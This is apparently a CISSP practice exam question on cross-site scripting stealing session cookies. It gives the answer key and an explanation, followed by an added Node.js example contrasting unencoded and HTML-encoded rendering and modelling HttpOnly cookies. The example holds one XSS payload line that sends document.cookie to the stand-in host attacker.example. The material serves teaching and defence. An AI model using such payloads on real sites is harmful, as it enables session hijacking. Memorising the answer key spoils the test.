Certified Information Systems Security Professional (CISSP) — Question 424
An organization recently suffered from a web-application attack that resulted in stolen user session cookie information. The attacker was able to obtain the information when a user's browser executed a script upon visiting a compromised website. What type of attack MOST likely occurred?
Answer options
- A. SQL injection (SQLi)
- B. Extensible Markup Language (XML) external entities
- C. Cross-Site Scripting (XSS)
- D. Cross-Site Request Forgery (CSRF)
Correct answer: C
Explanation
The correct answer is Cross-Site Scripting (XSS). In an XSS attack the attacker injects script into a web page (stored in the site's content or reflected from a crafted link), and the victim's browser executes that script in the context of the vulnerable site. Because the script runs with the site's origin, it can read document.cookie and send the session identifier to a host the attacker controls, which matches the scenario: the cookie was stolen when the user's browser executed a script on the visited site. The other options do not fit. SQL injection targets the back-end database through unsanitized query input, not the browser. XML external entity (XXE) injection abuses a server-side XML parser to read files or reach internal services. Cross-Site Request Forgery tricks the browser into sending an authenticated request on the user's behalf; it rides on the cookie the browser already attaches but never reads or exfiltrates it, and it does not depend on executing attacker-supplied script in the page. Common defenses against XSS are contextual output encoding of untrusted data, a Content Security Policy, and setting the HttpOnly attribute on session cookies so that script cannot read them even if an injection succeeds.
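The following is an added example, not part of the original question or its explanation. It models the attack the question describes and the two controls that defeat it: a comment field rendered without encoding (vulnerable) next to the same field rendered through HTML entity encoding (safe), and a session cookie built with the HttpOnly attribute, which the browser's document.cookie getter omits. The payload, the attacker hostname `attacker.example`, the session value and the helper names are all constructed for the demonstration; the page is modelled as a string so the code runs offline under Node.js.

```javascript
// Added example (not part of the original question page): how an XSS payload
// steals a session cookie, and the two controls that defeat it.
// Runs under Node.js; the "page" is modelled as a string so it runs offline.

// Constructed attacker payload. If echoed into the page without encoding, the
// browser executes it and ships document.cookie to the attacker's host
// (hypothetical hostname, used only for illustration).
const XSS_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>';

// Vulnerable rendering: user-controlled text is concatenated straight into HTML.
function renderCommentVulnerable(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Control 1: contextual output encoding. Each character that can change the
// HTML parse state is replaced by its entity, so the payload becomes inert text.
function escapeHtml(str) {
  return String(str).replace(/[&<>"'\/]/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
  })[ch]);
}

function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Crude check used only for this demonstration: does the rendered HTML still
// contain an executable script tag? (A real scanner would parse the HTML.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Control 2: the HttpOnly attribute. A cookie set with it is never exposed via
// document.cookie, so even a successful injection cannot read the session ID.
function buildSessionCookie(sessionId) {
  return `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of the browser's document.cookie getter: it returns name=value pairs
// for every cookie except those carrying the HttpOnly attribute.
function documentCookieView(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(";").map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === "httponly"))
    .map((parts) => parts[0])
    .join("; ");
}

// Run both renderings against the payload and show what injected script
// would be able to read from the cookie jar.
function demo() {
  const vulnerable = renderCommentVulnerable(XSS_PAYLOAD);
  const safe = renderCommentSafe(XSS_PAYLOAD);
  // Constructed cookie jar: the HttpOnly session cookie plus a harmless one.
  const cookies = [buildSessionCookie("abc123"), "theme=dark; Path=/"];
  return {
    vulnerableExecutes: containsScriptTag(vulnerable), // true: script survives
    safeExecutes: containsScriptTag(safe),             // false: encoded to text
    scriptSees: documentCookieView(cookies),           // "theme=dark" only
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Note that the two controls are complementary: output encoding stops the script from running at all, while HttpOnly limits the damage if some other injection point is missed. Neither replaces the other.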